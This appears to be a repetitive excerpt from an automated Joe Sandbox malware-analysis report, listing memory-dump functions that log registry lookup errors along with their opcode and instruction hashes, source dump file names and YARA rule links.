                                                                                                                                                  • Opcode Fuzzy Hash: b925a896082f3cbac8f85682289c0623576caa08c1e2f56db9f14118f2be1eb2
                                                                                                                                                  • Instruction Fuzzy Hash: 39F0F622A0878642E5538F0CB8803757244BF407E4F494536DF5D46691DF3DD986B300
                                                                                                                                                  Function 00007FF8B91827A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 56f8f947741124c32929831f6305df564f095b6d9a6d9a0b39bb5ff756825751
                                                                                                                                                  • Instruction ID: d163a41e2158c5c0ca51e3a5e43e51b2ad2e369288e8e6a8c2261f9dc8896303
                                                                                                                                                  • Opcode Fuzzy Hash: 56f8f947741124c32929831f6305df564f095b6d9a6d9a0b39bb5ff756825751
                                                                                                                                                  • Instruction Fuzzy Hash: C4F09662A0878642E6538F0CB8807757255BF407E4F494635DF5D46695DF3DD98AB300
                                                                                                                                                  Function 00007FF8BFB59A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
                                                                                                                                                  • Instruction ID: 245565dd909de259445d6a175790bd5f1e4e4d6fbed27ea345bc81cd26c0e710
                                                                                                                                                  • Opcode Fuzzy Hash: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
                                                                                                                                                  • Instruction Fuzzy Hash: 14F09062A0874A52F6528F88F9507B97354BF447E4F480236EF5D46A90EF3DE9999300
                                                                                                                                                  Function 00007FF8BFB599BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
                                                                                                                                                  • Instruction ID: c30fd3d5ff122b2e3da23e97c3b6e3aefb9d3525ce11ba51b10938096c705d9a
                                                                                                                                                  • Opcode Fuzzy Hash: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
                                                                                                                                                  • Instruction Fuzzy Hash: 68F09062A0874A52F5528F88B9507B9B354AF447E4F480236EF5D46A90EF3DE9999300
                                                                                                                                                  Function 00007FF8BFB599AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
                                                                                                                                                  • Instruction ID: b336394e2dc9d79598424f183d468c56f0e70399b5b51cb1ca8cb4cf78a4fcf7
                                                                                                                                                  • Opcode Fuzzy Hash: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
                                                                                                                                                  • Instruction Fuzzy Hash: 01F09062A0874A52F5528F88B9507B97358AF447E4F480236EF5D46690EF3DEA999300
                                                                                                                                                  Function 00007FF8BFB5991D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
                                                                                                                                                  • Instruction ID: b45ef00d2f7cad4a9e37787a2930321725fc9a89bb1f08694697b8f22e4b96dd
                                                                                                                                                  • Opcode Fuzzy Hash: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
                                                                                                                                                  • Instruction Fuzzy Hash: 7AF0F022A0830A42F5528F88B9503B97344AF443E4F480236EF4D46690EF3CE9898300
                                                                                                                                                  Function 00007FF8BFB59927 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 5e972d20f0db2410af95bb835652d4743476dec15b4255502ad73526abce4442
                                                                                                                                                  • Instruction ID: 0d88343078784fb747fad59486f2042eb4061bbf5d247dc76a56060d534d4796
                                                                                                                                                  • Opcode Fuzzy Hash: 5e972d20f0db2410af95bb835652d4743476dec15b4255502ad73526abce4442
                                                                                                                                                  • Instruction Fuzzy Hash: 75F09062A0864A52F5628F88F9507B97354BF447E4F480236EF5D466D0EF3DE9999300
                                                                                                                                                  Function 00007FF8BFB380EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 4431de4f8124a7a94acb3b6e3692c454a9cb3ecc2e31de966fdae785209df37a
                                                                                                                                                  • Instruction ID: 4d4beef45c721104ddb7f95a1f62e0068aacd3ebcdd3cffb40b23de80d046d09
                                                                                                                                                  • Opcode Fuzzy Hash: 4431de4f8124a7a94acb3b6e3692c454a9cb3ecc2e31de966fdae785209df37a
                                                                                                                                                  • Instruction Fuzzy Hash: FAF0F063688A0B42E9529F88BD413B96358AF407E4F080236DF1D4A690EF3DEA899301
                                                                                                                                                  Function 00007FF8BFB3805D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 595959e12e0d8d791a9631b33b262330948874470473a6cf288e0f8731749f32
                                                                                                                                                  • Instruction ID: 74bb848e39370cbf3ed5dfa01912da03b8f98bb765b7fdf385fb8fe01f3aa96f
                                                                                                                                                  • Opcode Fuzzy Hash: 595959e12e0d8d791a9631b33b262330948874470473a6cf288e0f8731749f32
                                                                                                                                                  • Instruction Fuzzy Hash: 39F0F063688B0B42E9529F88BD413B96358AF407E4F080236DF1D4A690EF3DE9899300
                                                                                                                                                  Function 00007FF8BFB38067 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 7ce75c16e399c1183033e576a59c15f89c45a6ed3088f81472bba314161fe703
                                                                                                                                                  • Instruction ID: fc5bbd9eb7f426a3f81e68470cd14ebbd977d122181cabeba9f49a78826d0f45
                                                                                                                                                  • Opcode Fuzzy Hash: 7ce75c16e399c1183033e576a59c15f89c45a6ed3088f81472bba314161fe703
                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0B463698A4B42E9529FC8FD413B96358BF447E4F480236DF5D4A6D0EF3DE9899300
                                                                                                                                                  Function 00007FF8BFB38178 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 8b6597c3c96ecf1030993586f09daf402de802ff915c0124a2dd22e0bd7580e4
                                                                                                                                                  • Instruction ID: 3d2c65ac07a95d82d7359f72a234034ac2b8b2c62d7ff01dd1c7e8dfc016c077
                                                                                                                                                  • Opcode Fuzzy Hash: 8b6597c3c96ecf1030993586f09daf402de802ff915c0124a2dd22e0bd7580e4
                                                                                                                                                  • Instruction Fuzzy Hash: 90F09063688B4A42EA529F88FD413B96358BF447E4F084236DF5D46690EF3DE9899301
                                                                                                                                                  Function 00007FF8BFB380FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: f5e9a1a5a4fa95b997aadb3c19c1bfd70e8aa5bab72be4b72225d5cd458617d4
                                                                                                                                                  • Instruction ID: bb839a9bad1608df6abf79ec70382c0f04b87bc573ec2b47ba5972b0faac35ab
                                                                                                                                                  • Opcode Fuzzy Hash: f5e9a1a5a4fa95b997aadb3c19c1bfd70e8aa5bab72be4b72225d5cd458617d4
                                                                                                                                                  • Instruction Fuzzy Hash: FEF0F66364860B42E5529FC8BD413756358AF407D4F080236DF1D46690DF3DD9459300
                                                                                                                                                  Function 00007FF8BFB8D8E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: bfd4d7c23c0b7adf3137a3b763528e200069e4440a80c3d59950c302005c2d69
                                                                                                                                                  • Instruction ID: 08842ea5986aab74ab62d003b659cb0a2536b629024817f39d26b5f7c611f187
                                                                                                                                                  • Opcode Fuzzy Hash: bfd4d7c23c0b7adf3137a3b763528e200069e4440a80c3d59950c302005c2d69
                                                                                                                                                  • Instruction Fuzzy Hash: CBF02422A0820A42EA929F88FC413B97344BF847E4F080236EF4C466D2EF3DD989C300
                                                                                                                                                  Function 00007FF8BFB8D8DD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 915b2df0735b1b4a45862a718138cf0af1dd01a469394c247dcd6d9b00ff717d
                                                                                                                                                  • Instruction ID: df10cc15b72600465b6a6392655c3e9b3b17ac6780dc0cb35f3fc2f4316ce350
                                                                                                                                                  • Opcode Fuzzy Hash: 915b2df0735b1b4a45862a718138cf0af1dd01a469394c247dcd6d9b00ff717d
                                                                                                                                                  • Instruction Fuzzy Hash: 29F02422B0830A42EA929F88F8413B97344BF847E4F080236EF4D466D2EF3DD989C300
                                                                                                                                                  Function 00007FF8BFB8D9F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 14a6f1e05bd0c348ba73e5c5846f41afe97600fefa0b9d78abdf6e0ac06ac377
                                                                                                                                                  • Instruction ID: a3e958735eb5bca3f5a36b5a9bec07b7e5c898fa3721481621927c0536bb929b
                                                                                                                                                  • Opcode Fuzzy Hash: 14a6f1e05bd0c348ba73e5c5846f41afe97600fefa0b9d78abdf6e0ac06ac377
                                                                                                                                                  • Instruction Fuzzy Hash: 27F0B462A0874A42EA92DF88F8417B97354BF847E4F084236EF5D466D6EF3DD989D300
                                                                                                                                                  Function 00007FF8BFB8D97C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
